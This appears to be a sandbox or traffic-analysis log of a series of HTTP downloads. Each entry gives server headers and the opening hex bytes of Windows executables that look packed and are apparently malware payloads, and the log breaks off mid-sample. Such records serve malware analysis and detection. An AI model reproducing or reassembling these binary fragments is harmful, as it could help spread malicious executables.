Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 01 Feb 2025 20:36:54 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 20:37:08 GMTContent-Type: application/octet-streamContent-Length: 6441984Last-Modified: Sat, 01 Feb 2025 19:54:16 GMTConnection: keep-aliveETag: "679e7be8-624c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 52 54 9b 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 d0 47 00 00 c6 69 00 00 32 00 00 00 c0 a0 00 00 10 00 00 00 e0 47 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 f0 a0 00 00 04 00 00 db 2d 63 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 10 67 00 73 00 00 00 00 00 67 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 c8 69 00 88 06 00 00 a0 a2 a0 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 a2 a0 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 f0 66 00 00 10 00 00 00 8c 28 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 00 67 00 00 02 00 00 00 9c 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 10 67 00 00 02 00 00 00 9e 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 76 66 62 70 7a 61 63 78 00 90 39 00 00 20 67 00 00 86 39 00 00 a0 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 70 79 6f 65 79 66 6d 00 10 00 00 00 b0 a0 00 00 04 00 00 00 26 62 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 a0 00 00 22 00 00 00 2a 62 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 20:37:17 GMTContent-Type: application/octet-streamContent-Length: 1892864Last-Modified: Sat, 01 Feb 2025 18:59:10 GMTConnection: keep-aliveETag: "679e6efe-1ce200"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 6e 4e 99 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 6a 04 00 00 ae 00 00 00 00 00 00 00 60 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 4a 00 00 04 00 00 dc 0b 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 05 00 6b 00 00 00 00 90 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 a1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 05 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 90 05 00 00 02 00 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 05 00 00 02 00 00 00 a2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 80 2a 00 00 b0 05 00 00 02 00 00 00 a4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 69 68 69 63 67 67 67 00 20 1a 00 00 30 30 00 00 14 1a 00 00 a6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 6d 69 7a 7a 75 69 6f 00 10 00 00 00 50 4a 00 00 06 00 00 00 ba 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 60 4a 00 00 22 00 00 00 c0 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 20:37:22 GMTContent-Type: application/octet-streamContent-Length: 1805824Last-Modified: Fri, 31 Jan 2025 09:36:52 GMTConnection: keep-aliveETag: "679c99b4-1b8e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 a2 a9 0c f0 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 74 01 00 00 08 00 00 00 00 00 00 00 40 47 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 47 00 00 04 00 00 53 b9 1b 00 03 00 40 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 c0 01 00 69 00 00 00 00 a0 01 00 4c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 c1 01 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 01 00 00 20 00 00 00 a4 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 4c 05 00 00 00 a0 01 00 00 04 00 00 00 c4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 c0 01 00 00 02 00 00 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 a0 2a 00 00 e0 01 00 00 02 00 00 00 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 66 72 71 63 6f 66 67 00 a0 1a 00 00 80 2c 00 00 9c 1a 00 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 71 72 66 79 62 62 63 00 20 00 00 00 20 47 00 00 04 00 00 00 68 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 40 47 00 00 22 00 00 00 6c 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 20:37:26 GMTContent-Type: application/octet-streamContent-Length: 1862656Last-Modified: Sat, 01 Feb 2025 20:32:00 GMTConnection: keep-aliveETag: "679e84c0-1c6c00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 12 25 9e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 66 04 00 00 ac 00 00 00 00 00 00 00 40 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 49 00 00 04 00 00 8b 70 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 90 05 00 6b 00 00 00 00 80 05 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 05 00 00 10 00 00 00 8a 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 80 05 00 00 02 00 00 00 9a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 05 00 00 02 00 00 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 29 00 00 a0 05 00 00 02 00 00 00 9e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 79 66 78 73 65 6a 62 00 b0 19 00 00 80 2f 00 00 a6 19 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 6d 6f 6c 77 6c 73 77 00 10 00 00 00 30 49 00 00 04 00 00 00 46 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 49 00 00 22 00 00 00 4a 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 20:37:32 GMTContent-Type: application/octet-streamContent-Length: 1828864Last-Modified: Sat, 01 Feb 2025 20:32:10 GMTConnection: keep-aliveETag: "679e84ca-1be800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 cb bd 98 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 e0 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 6a 00 00 04 00 00 7f 7c 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 8c 03 00 00 00 a0 24 00 00 04 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2a 00 00 c0 24 00 00 02 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 72 7a 61 72 6a 61 6b 00 50 1a 00 00 80 4f 00 00 42 1a 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 6c 71 63 65 68 61 61 00 10 00 00 00 d0 69 00 00 04 00 00 00 c2 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 69 00 00 22 00 00 00 c6 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 20:37:37 GMTContent-Type: application/octet-streamContent-Length: 970240Last-Modified: Sat, 01 Feb 2025 20:29:43 GMTConnection: keep-aliveETag: "679e8437-ece00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0e 84 9e 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 1e 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 0f 00 00 04 00 00 47 d2 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 0c 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 0c 62 01 00 00 40 0d 00 00 64 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 b0 0e 00 00 76 00 00 00 58 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 20:37:42 GMTContent-Type: application/octet-streamContent-Length: 961024Last-Modified: Sat, 01 Feb 2025 20:29:29 GMTConnection: keep-aliveETag: "679e8429-eaa00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a 